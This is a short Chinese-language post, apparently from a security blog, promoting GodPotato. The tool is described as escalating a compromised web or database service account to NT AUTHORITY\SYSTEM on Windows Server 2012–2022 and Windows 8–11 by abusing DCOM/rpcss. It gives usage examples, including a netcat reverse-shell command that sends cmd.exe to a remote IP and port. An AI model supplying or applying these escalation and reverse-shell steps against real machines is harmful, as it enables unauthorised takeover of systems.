DCOM 提权利用工具:GodPotato | 支持绝大多数Windows操作系统
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/BeichenDream/GodPotato
GodPotato
基于土豆提权的六年历史,从RottenPotato到JuicyPotatoNG的开端,通过研究DCOM我发现了一项新技术,使得在Windows 2012 - Windows 2022上可以进行权限升级,只要你拥有“ImpersonatePrivilege”权限,就可以成为“NT AUTHORITY\SYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
土豆特权升级通常在我们获得WEB/数据库权限时使用。我们可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”权限。然而,历史上的土豆无法在最新的Windows系统上运行。当我研究DCOM时,我发现了一种新的方法来执行权限升级。在处理oxid时,rpcss存在一些缺陷,而rpcss是必须由系统打开的服务,所以它可以在几乎任何Windows操作系统上运行,我把它命名为GodPotato。
受影响的版本
Windows Server 2012 - Windows Server 2022、Windows8 - Windows 11
示例
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
Arguments:
-cmd Required:True CommandLine (default cmd /c whoami)
Example:
GodPotato -cmd "cmd /c whoami"使用程序内置的Clsid进行特权升级并执行简单的命令
GodPotato -cmd "cmd /c whoami"
自定义 Clsid 并执行命令
GodPotato -cmd "cmd /c whoami"
执行反弹shell命令
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
标签:工具分享, 本地提权